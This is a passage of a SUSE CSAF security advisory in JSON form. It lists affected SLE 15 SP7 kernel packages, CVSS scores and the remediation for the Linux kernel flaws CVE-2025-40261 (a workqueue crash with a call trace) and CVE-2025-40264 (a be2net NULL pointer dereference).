0018:ff579b19482d3e50 EFLAGS: 00010046\n[ 1135.985015] RAX: 0000000000000033 RBX: ff2d24c8093f31f0 RCX: 0000000000000000\n[ 1135.992148] RDX: 0000000000000000 RSI: ff2d24d6bfa1d0c0 RDI: ff2d24d6bfa1d0c0\n[ 1135.999278] RBP: ff2d24c8093f31f8 R08: 0000000000000000 R09: ffffffff951e2b08\n[ 1136.006413] R10: ffffffff95122ac8 R11: 0000000000000003 R12: ff2d24c78697c100\n[ 1136.013546] R13: fffffffffffffff8 R14: 0000000000000000 R15: ff2d24c78697c0c0\n[ 1136.020677] FS: 0000000000000000(0000) GS:ff2d24d6bfa00000(0000) knlGS:0000000000000000\n[ 1136.028765] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033\n[ 1136.034510] CR2: 00007fd207f90b80 CR3: 000000163ea22003 CR4: 0000000000f73ef0\n[ 1136.041641] DR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000\n[ 1136.048776] DR3: 0000000000000000 DR6: 00000000fffe07f0 DR7: 0000000000000400\n[ 1136.055910] PKRU: 55555554\n[ 1136.058623] Call Trace:\n[ 1136.061074] \u003cTASK\u003e\n[ 1136.063179] ? show_trace_log_lvl+0x1b0/0x2f0\n[ 1136.067540] ? show_trace_log_lvl+0x1b0/0x2f0\n[ 1136.071898] ? move_linked_works+0x4a/0xa0\n[ 1136.075998] ? __list_del_entry_valid_or_report.cold+0xf/0x6f\n[ 1136.081744] ? __die_body.cold+0x8/0x12\n[ 1136.085584] ? die+0x2e/0x50\n[ 1136.088469] ? do_trap+0xca/0x110\n[ 1136.091789] ? do_error_trap+0x65/0x80\n[ 1136.095543] ? __list_del_entry_valid_or_report.cold+0xf/0x6f\n[ 1136.101289] ? exc_invalid_op+0x50/0x70\n[ 1136.105127] ? __list_del_entry_valid_or_report.cold+0xf/0x6f\n[ 1136.110874] ? asm_exc_invalid_op+0x1a/0x20\n[ 1136.115059] ? __list_del_entry_valid_or_report.cold+0xf/0x6f\n[ 1136.120806] move_linked_works+0x4a/0xa0\n[ 1136.124733] worker_thread+0x216/0x3a0\n[ 1136.128485] ? __pfx_worker_thread+0x10/0x10\n[ 1136.132758] kthread+0xfa/0x240\n[ 1136.135904] ? __pfx_kthread+0x10/0x10\n[ 1136.139657] ret_from_fork+0x31/0x50\n[ 1136.143236] ? __pfx_kthread+0x10/0x10\n[ 1136.146988] ret_from_fork_asm+0x1a/0x30\n[ 1136.150915] \u003c/TASK\u003e",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-devel-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-macros-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-zfcpdump-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-docs-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-source-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Workstation Extension 15 SP7:kernel-default-extra-6.4.0-150700.53.31.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-40261",
"url": "https://www.suse.com/security/cve/CVE-2025-40261"
},
{
"category": "external",
"summary": "SUSE Bug 1254839 for CVE-2025-40261",
"url": "https://bugzilla.suse.com/1254839"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-devel-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-macros-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-zfcpdump-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-docs-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-source-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Workstation Extension 15 SP7:kernel-default-extra-6.4.0-150700.53.31.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-devel-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-macros-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-zfcpdump-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-docs-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-source-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Workstation Extension 15 SP7:kernel-default-extra-6.4.0-150700.53.31.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-11T14:05:07Z",
"details": "moderate"
}
],
"title": "CVE-2025-40261"
},
{
"cve": "CVE-2025-40264",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-40264"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nbe2net: pass wrb_params in case of OS2BMC\n\nbe_insert_vlan_in_pkt() is called with the wrb_params argument being NULL\nat be_send_pkt_to_bmc() call site. This may lead to dereferencing a NULL\npointer when processing a workaround for specific packet, as commit\nbc0c3405abbb (\"be2net: fix a Tx stall bug caused by a specific ipv6\npacket\") states.\n\nThe correct way would be to pass the wrb_params from be_xmit().",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-devel-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-macros-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-zfcpdump-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-docs-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-source-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.aarch64",
